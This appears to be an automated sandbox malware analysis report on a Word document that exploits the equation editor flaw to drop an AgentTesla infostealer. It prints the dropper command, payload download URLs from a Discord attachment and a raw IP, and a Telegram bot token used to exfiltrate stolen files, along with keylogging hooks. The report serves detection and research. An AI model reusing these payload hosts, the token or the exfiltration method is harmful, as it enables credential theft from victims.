                  Source: Client.exe, 00000009.00000002.928094974.00000000003DD000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000A.00000002.989116143.0000000005870000.00000004.00000800.00020000.00000000.sdmp, Client.exe, 0000000C.00000002.984052209.00000000008A8000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.1005830692.0000000006057000.00000004.00000800.00020000.00000000.sdmp, Client.exe, 00000014.00000002.1001151669.000000000054D000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000015.00000002.1196914685.0000000005EBE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
                  Source: Client.exe, 00000009.00000002.928094974.00000000003DD000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000A.00000002.989116143.0000000005870000.00000004.00000800.00020000.00000000.sdmp, Client.exe, 0000000C.00000002.984052209.00000000008A8000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.1005830692.0000000006057000.00000004.00000800.00020000.00000000.sdmp, Client.exe, 00000014.00000002.1001151669.000000000054D000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000015.00000002.1196914685.0000000005EBE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.entrust.net/2048ca.crl0
                  Source: RegSvcs.exe, 0000000F.00000002.1005830692.0000000006057000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.entrust.net/server
                  Source: Client.exe, 00000009.00000002.928094974.00000000003DD000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000A.00000002.989116143.0000000005870000.00000004.00000800.00020000.00000000.sdmp, Client.exe, 0000000C.00000002.984052209.00000000008A8000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.1005830692.0000000006057000.00000004.00000800.00020000.00000000.sdmp, Client.exe, 00000014.00000002.1001151669.000000000054D000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000015.00000002.1196914685.0000000005EBE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.entrust.net/server1.crl0
                  Source: Client.exe, 00000009.00000002.928058615.00000000003AF000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000A.00000002.988927572.0000000005840000.00000004.00000800.00020000.00000000.sdmp, Client.exe, 0000000C.00000002.984052209.00000000008A8000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.1002019894.000000000057E000.00000004.00000020.00020000.00000000.sdmp, Client.exe, 00000014.00000002.1001151669.000000000054D000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000015.00000002.1196776465.0000000005EA0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
                  Source: Client.exe, 00000009.00000002.928094974.00000000003DD000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000A.00000002.989116143.0000000005870000.00000004.00000800.00020000.00000000.sdmp, Client.exe, 0000000C.00000002.984052209.00000000008A8000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.1005830692.0000000006057000.00000004.00000800.00020000.00000000.sdmp, Client.exe, 00000014.00000002.1001151669.000000000054D000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000015.00000002.1196914685.0000000005EBE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
                  Source: Client.exe, 00000009.00000002.928094974.00000000003DD000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000A.00000002.989116143.0000000005870000.00000004.00000800.00020000.00000000.sdmp, Client.exe, 0000000C.00000002.984052209.00000000008A8000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.1005830692.0000000006057000.00000004.00000800.00020000.00000000.sdmp, Client.exe, 00000014.00000002.1001151669.000000000054D000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000015.00000002.1196914685.0000000005EBE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
                  Source: RegSvcs.exe, 00000015.00000002.1192835288.0000000002279000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://fWvVfB.com
                  Source: Client.exe, 00000009.00000002.928094974.00000000003DD000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000A.00000002.989116143.0000000005870000.00000004.00000800.00020000.00000000.sdmp, Client.exe, 0000000C.00000002.984052209.00000000008A8000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.1005830692.0000000006057000.00000004.00000800.00020000.00000000.sdmp, Client.exe, 00000014.00000002.1001151669.000000000054D000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000015.00000002.1196914685.0000000005EBE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0
                  Source: Client.exe, 00000009.00000002.928094974.00000000003DD000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000A.00000002.989116143.0000000005870000.00000004.00000800.00020000.00000000.sdmp, Client.exe, 0000000C.00000002.984052209.00000000008A8000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.1005830692.0000000006057000.00000004.00000800.00020000.00000000.sdmp, Client.exe, 00000014.00000002.1001151669.000000000054D000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000015.00000002.1196914685.0000000005EBE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0%
                  Source: Client.exe, 00000009.00000002.928094974.00000000003DD000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000A.00000002.989116143.0000000005870000.00000004.00000800.00020000.00000000.sdmp, Client.exe, 0000000C.00000002.984052209.00000000008A8000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.1005830692.0000000006057000.00000004.00000800.00020000.00000000.sdmp, Client.exe, 00000014.00000002.1001151669.000000000054D000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000015.00000002.1196914685.0000000005EBE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0-
                  Source: Client.exe, 00000009.00000002.928094974.00000000003DD000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000A.00000002.989116143.0000000005870000.00000004.00000800.00020000.00000000.sdmp, Client.exe, 0000000C.00000002.984052209.00000000008A8000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.1005830692.0000000006057000.00000004.00000800.00020000.00000000.sdmp, Client.exe, 00000014.00000002.1001151669.000000000054D000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000015.00000002.1196914685.0000000005EBE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0/
                  Source: Client.exe, 00000009.00000002.928094974.00000000003DD000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000A.00000002.989116143.0000000005870000.00000004.00000800.00020000.00000000.sdmp, Client.exe, 0000000C.00000002.984052209.00000000008A8000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.1005830692.0000000006057000.00000004.00000800.00020000.00000000.sdmp, Client.exe, 00000014.00000002.1001151669.000000000054D000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000015.00000002.1196914685.0000000005EBE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com05
                  Source: Client.exe, 00000009.00000002.928094974.00000000003DD000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000A.00000002.989116143.0000000005870000.00000004.00000800.00020000.00000000.sdmp, Client.exe, 0000000C.00000002.984052209.00000000008A8000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.1005830692.0000000006057000.00000004.00000800.00020000.00000000.sdmp, Client.exe, 00000014.00000002.1001151669.000000000054D000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000015.00000002.1196914685.0000000005EBE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.entrust.net03
                  Source: Client.exe, 00000009.00000002.928094974.00000000003DD000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000A.00000002.989116143.0000000005870000.00000004.00000800.00020000.00000000.sdmp, Client.exe, 0000000C.00000002.984052209.00000000008A8000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.1005830692.0000000006057000.00000004.00000800.00020000.00000000.sdmp, Client.exe, 00000014.00000002.1001151669.000000000054D000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000015.00000002.1196914685.0000000005EBE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.entrust.net0D
                  Source: Client.exe, 00000009.00000002.928299566.0000000002101000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000A.00000002.987311161.0000000002420000.00000004.00000800.00020000.00000000.sdmp, Client.exe, 0000000C.00000002.984634446.0000000002641000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.1004034491.0000000002182000.00000004.00000800.00020000.00000000.sdmp, Client.exe, 00000014.00000002.1001971815.000000000264B000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000015.00000002.1194461229.0000000002392000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                  Source: Client.exe, 00000009.00000002.928094974.00000000003DD000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000A.00000002.989116143.0000000005870000.00000004.00000800.00020000.00000000.sdmp, Client.exe, 0000000C.00000002.984052209.00000000008A8000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.1005830692.0000000006057000.00000004.00000800.00020000.00000000.sdmp, Client.exe, 00000014.00000002.1001151669.000000000054D000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000015.00000002.1196914685.0000000005EBE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com.my/cps.htm02
                  Source: Client.exe, 00000009.00000002.928094974.00000000003DD000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000A.00000002.989116143.0000000005870000.00000004.00000800.00020000.00000000.sdmp, Client.exe, 0000000C.00000002.984052209.00000000008A8000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.1005830692.0000000006057000.00000004.00000800.00020000.00000000.sdmp, Client.exe, 00000014.00000002.1001151669.000000000054D000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000015.00000002.1196914685.0000000005EBE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
                  Source: RegSvcs.exe, 00000015.00000002.1193947075.0000000002320000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000015.00000002.1194571279.00000000023A6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ypWPmbJ0rAhp55WcExAk.org
                  Source: RegSvcs.exe, 0000000A.00000002.986080759.0000000002309000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.1002709829.0000000002069000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000015.00000002.1192835288.0000000002279000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org%
                  Source: RegSvcs.exe, 00000015.00000002.1192835288.0000000002279000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org%%startupfolder%
                  Source: RegSvcs.exe, 0000000A.00000002.987311161.0000000002420000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000A.00000002.987738034.0000000002481000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.1004034491.0000000002182000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000015.00000002.1194992268.00000000023F5000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000015.00000002.1194461229.0000000002392000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org
                  Source: Client.exe, 00000009.00000002.932287438.0000000003109000.00000004.00000800.00020000.00000000.sdmp, Client.exe, 00000009.00000002.932391087.0000000003169000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000A.00000000.926194509.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot5520247480:AAEoBq-eVV-KfON2FKSf_2riekCozVDdnus/
                  Source: RegSvcs.exe, 0000000A.00000002.987311161.0000000002420000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000A.00000002.984264815.000000000031E000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.1004034491.0000000002182000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.1001492987.0000000000501000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000015.00000002.1194461229.0000000002392000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot5520247480:AAEoBq-eVV-KfON2FKSf_2riekCozVDdnus/sendDocument
                  Source: RegSvcs.exe, 00000015.00000002.1192835288.0000000002279000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot5520247480:AAEoBq-eVV-KfON2FKSf_2riekCozVDdnus/sendDocumentdocument-----
                  Source: RegSvcs.exe, 0000000A.00000002.987311161.0000000002420000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.1004034491.0000000002182000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000015.00000002.1194461229.0000000002392000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.orgP
                  Source: Client.exe, 00000009.00000002.928299566.0000000002101000.00000004.00000800.00020000.00000000.sdmp, Client.exe, 0000000C.00000002.984634446.0000000002641000.00000004.00000800.00020000.00000000.sdmp, Client.exe, 00000014.00000002.1001971815.000000000264B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.discordapp.com
                  Source: Client.exe, 00000009.00000002.928299566.0000000002101000.00000004.00000800.00020000.00000000.sdmp, Client.exe, 00000009.00000002.928058615.00000000003AF000.00000004.00000020.00020000.00000000.sdmp, Client.exe, 0000000C.00000002.984052209.00000000008A8000.00000004.00000020.00020000.00000000.sdmp, Client.exe, 0000000C.00000002.984634446.0000000002641000.00000004.00000800.00020000.00000000.sdmp, Client.exe, 00000014.00000002.1001151669.000000000054D000.00000004.00000020.00020000.00000000.sdmp, Client.exe, 00000014.00000002.1001971815.000000000264B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.discordapp.com/attachments/1005703293437235255/1005705055426588785/RealProxyFlagsBadSign
                  Source: Client.exe, 00000009.00000002.928094974.00000000003DD000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000A.00000002.989116143.0000000005870000.00000004.00000800.00020000.00000000.sdmp, Client.exe, 0000000C.00000002.984052209.00000000008A8000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.1005830692.0000000006057000.00000004.00000800.00020000.00000000.sdmp, Client.exe, 00000014.00000002.1001151669.000000000054D000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000015.00000002.1196914685.0000000005EBE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://secure.comodo.com/CPS0
                  Source: RegSvcs.exe, 0000000A.00000002.986080759.0000000002309000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.1002709829.0000000002069000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000015.00000002.1192835288.0000000002279000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.ziphttps://www
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{0FBA591C-1198-4182-9EE3-9B1EEE452FAA}.tmpJump to behavior
                  Source: unknownDNS traffic detected: queries for: cdn.discordapp.com
                  Source: global trafficHTTP traffic detected: GET /attachments/1005703293437235255/1005705055426588785/RealProxyFlagsBadSignature.dll HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /attachments/1005703293437235255/1005705055426588785/RealProxyFlagsBadSignature.dll HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /attachments/1005703293437235255/1005705055426588785/RealProxyFlagsBadSignature.dll HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /htdocs/eZYWw.exe HTTP/1.1Host: 109.206.241.81Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /htdocs/eZYWw.exe HTTP/1.1Host: 109.206.241.81Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /htdocs/eZYWw.exe HTTP/1.1Host: 109.206.241.81Connection: Keep-Alive
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49179
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49177
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49183 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49176
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49181 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49182 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49175
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49173
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49183
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49182
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49181
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49175 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49176 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49173 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49177 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49179 -> 443
                  Source: unknownTCP traffic detected without corresponding DNS query: 109.206.241.81
                  Source: unknownTCP traffic detected without corresponding DNS query: 109.206.241.81
                  Source: unknownTCP traffic detected without corresponding DNS query: 109.206.241.81
                  Source: unknownTCP traffic detected without corresponding DNS query: 109.206.241.81
                  Source: unknownTCP traffic detected without corresponding DNS query: 109.206.241.81
                  Source: unknownTCP traffic detected without corresponding DNS query: 109.206.241.81
                  Source: unknownTCP traffic detected without corresponding DNS query: 109.206.241.81
                  Source: unknownTCP traffic detected without corresponding DNS query: 109.206.241.81
                  Source: unknownTCP traffic detected without corresponding DNS query: 109.206.241.81
                  Source: unknownTCP traffic detected without corresponding DNS query: 109.206.241.81
                  Source: unknownTCP traffic detected without corresponding DNS query: 109.206.241.81
                  Source: unknownTCP traffic detected without corresponding DNS query: 109.206.241.81
                  Source: unknownTCP traffic detected without corresponding DNS query: 109.206.241.81
                  Source: unknownTCP traffic detected without corresponding DNS query: 109.206.241.81
                  Source: unknownTCP traffic detected without corresponding DNS query: 109.206.241.81
                  Source: unknownTCP traffic detected without corresponding DNS query: 109.206.241.81
                  Source: unknownTCP traffic detected without corresponding DNS query: 109.206.241.81
                  Source: unknownTCP traffic detected without corresponding DNS query: 109.206.241.81
                  Source: unknownTCP traffic detected without corresponding DNS query: 109.206.241.81
                  Source: unknownTCP traffic detected without corresponding DNS query: 109.206.241.81
                  Source: unknownTCP traffic detected without corresponding DNS query: 109.206.241.81
                  Source: unknownTCP traffic detected without corresponding DNS query: 109.206.241.81
                  Source: unknownTCP traffic detected without corresponding DNS query: 109.206.241.81
                  Source: unknownTCP traffic detected without corresponding DNS query: 109.206.241.81
                  Source: unknownTCP traffic detected without corresponding DNS query: 109.206.241.81
                  Source: unknownTCP traffic detected without corresponding DNS query: 109.206.241.81
                  Source: unknownTCP traffic detected without corresponding DNS query: 109.206.241.81
                  Source: unknownTCP traffic detected without corresponding DNS query: 109.206.241.81
                  Source: unknownTCP traffic detected without corresponding DNS query: 109.206.241.81
                  Source: unknownTCP traffic detected without corresponding DNS query: 109.206.241.81
                  Source: unknownTCP traffic detected without corresponding DNS query: 109.206.241.81
                  Source: unknownTCP traffic detected without corresponding DNS query: 109.206.241.81
                  Source: unknownTCP traffic detected without corresponding DNS query: 109.206.241.81
                  Source: unknownTCP traffic detected without corresponding DNS query: 109.206.241.81
                  Source: unknownTCP traffic detected without corresponding DNS query: 109.206.241.81
                  Source: unknownTCP traffic detected without corresponding DNS query: 109.206.241.81
                  Source: unknownTCP traffic detected without corresponding DNS query: 109.206.241.81
                  Source: unknownTCP traffic detected without corresponding DNS query: 109.206.241.81
                  Source: unknownTCP traffic detected without corresponding DNS query: 109.206.241.81
                  Source: unknownTCP traffic detected without corresponding DNS query: 109.206.241.81
                  Source: unknownTCP traffic detected without corresponding DNS query: 109.206.241.81
                  Source: unknownTCP traffic detected without corresponding DNS query: 109.206.241.81
                  Source: unknownTCP traffic detected without corresponding DNS query: 109.206.241.81
                  Source: unknownTCP traffic detected without corresponding DNS query: 109.206.241.81
                  Source: unknownTCP traffic detected without corresponding DNS query: 109.206.241.81
                  Source: unknownTCP traffic detected without corresponding DNS query: 109.206.241.81
                  Source: unknownTCP traffic detected without corresponding DNS query: 109.206.241.81
                  Source: unknownTCP traffic detected without corresponding DNS query: 109.206.241.81
                  Source: unknownTCP traffic detected without corresponding DNS query: 109.206.241.81
                  Source: unknownTCP traffic detected without corresponding DNS query: 109.206.241.81
                  Source: Client.exe, 00000009.00000002.928094974.00000000003DD000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000A.00000002.989116143.0000000005870000.00000004.00000800.00020000.00000000.sdmp, Client.exe, 0000000C.00000002.984052209.00000000008A8000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.1005830692.0000000006057000.00000004.00000800.00020000.00000000.sdmp, Client.exe, 00000014.00000002.1001151669.000000000054D000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000015.00000002.1196914685.0000000005EBE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)
                  Source: unknownHTTP traffic detected: POST /bot5520247480:AAEoBq-eVV-KfON2FKSf_2riekCozVDdnus/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8da7964e1c1748cHost: api.telegram.orgContent-Length: 1028Expect: 100-continueConnection: Keep-Alive
                  Source: unknownHTTPS traffic detected: 162.159.134.233:443 -> 192.168.2.22:49173 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.22:49175 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 162.159.133.233:443 -> 192.168.2.22:49177 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 162.159.135.233:443 -> 192.168.2.22:49179 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.22:49181 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.22:49182 version: TLS 1.2

                  Key, Mouse, Clipboard, Microphone and Screen Capturing

                  barindex
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWindows user hook set: 0 keyboard low level C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWindows user hook set: 0 keyboard low level C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWindow created: window name: CLIPBRDWNDCLASS

                  System Summary

                  barindex
                  Source: ~WRF{B571C632-7DEC-4279-BDFC-1CEF56BCD21F}.tmp.0.drStream path '_1721484245/\x1Ole10Native' : ....Client.exe.C:\fakepath\Client.exe.........C:\
                  Source: ~WRF{B571C632-7DEC-4279-BDFC-1CEF56BCD21F}.tmp.0.drStream path '_1721484284/\x1Ole10Native' : .!....Client.exe.C:\fakepath\Client.exe.....-...C:
                  Source: ICPO07082299976.doc, type: SAMPLEMatched rule: Attempts to exploit CVE-2018-0802 Author: Rich Warren
                  Source: dump.pcap, type: PCAPMatched rule: Windows_Trojan_AgentTesla_d3ac2b2f Author: unknown
                  Source: 9.2.Client.exe.3169510.3.unpack, type: UNPACKEDPEMatched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
                  Source: 9.2.Client.exe.3169510.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_AgentTesla_d3ac2b2f Author: unknown
                  Source: 10.0.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
                  Source: 10.0.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_AgentTesla_d3ac2b2f Author: unknown
                  Source: 9.2.Client.exe.3169510.3.raw.unpack, type: UNPACKEDPEMatched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
                  Source: 9.2.Client.exe.3169510.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_AgentTesla_d3ac2b2f Author: unknown
                  Source: 00000009.00000002.932287438.0000000003109000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_AgentTesla_d3ac2b2f Author: unknown
                  Source: 00000009.00000002.932391087.0000000003169000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_AgentTesla_d3ac2b2f Author: unknown
                  Source: 0000000A.00000000.926194509.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_AgentTesla_d3ac2b2f Author: unknown
                  Source: Process Memory Space: Client.exe PID: 2348, type: MEMORYSTRMatched rule: Windows_Trojan_AgentTesla_d3ac2b2f Author: unknown
                  Source: Process Memory Space: RegSvcs.exe PID: 2656, type: MEMORYSTRMatched rule: Windows_Trojan_AgentTesla_d3ac2b2f Author: unknown
                  Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{B571C632-7DEC-4279-BDFC-1CEF56BCD21F}.tmp, type: DROPPEDMatched rule: EXP_potential_CVE_2017_11882 Author: ReversingLabs
                  Source: ~WRF{B571C632-7DEC-4279-BDFC-1CEF56BCD21F}.tmp.0.drStream path '_1721484246/Equation Native' : ...............\.[..............3PD$RP.cmd.exe /c%tmp%\Client.exe &D$,f-Q%...........
                  Source: ~WRF{B571C632-7DEC-4279-BDFC-1CEF56BCD21F}.tmp.0.drStream path '_1721484254/Equation Native' : ...............\.[.............ZZcmd.exe /c%tmp%\Client.exe A..C................................................................................................................
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Temp\Client.exeJump to dropped file
                  Source: ~WRF{B571C632-7DEC-4279-BDFC-1CEF56BCD21F}.tmp.0.drStream path '_1721484245/\x1Ole10Native' : MZ signature found
                  Source: ~WRF{B571C632-7DEC-4279-BDFC-1CEF56BCD21F}.tmp.0.drStream path '_1721484284/\x1Ole10Native' : MZ signature found
                  Source: Client.exeStatic RTF information: Object: 0 Offset: 000000EBh Client.exe
                  Source: C:\Users\user\AppData\Local\Temp\Client.exeCode function: 9_2_002F20689_2_002F2068
                  Source: C:\Users\user\AppData\Local\Temp\Client.exeCode function: 9_2_002F28C99_2_002F28C9
                  Source: C:\Users\user\AppData\Local\Temp\Client.exeCode function: 9_2_002F20619_2_002F2061
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_005AB07010_2_005AB070
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_005A42A010_2_005A42A0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_005A9CF810_2_005A9CF8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_005ACC9810_2_005ACC98
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_005AA5F010_2_005AA5F0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_005A45E810_2_005A45E8
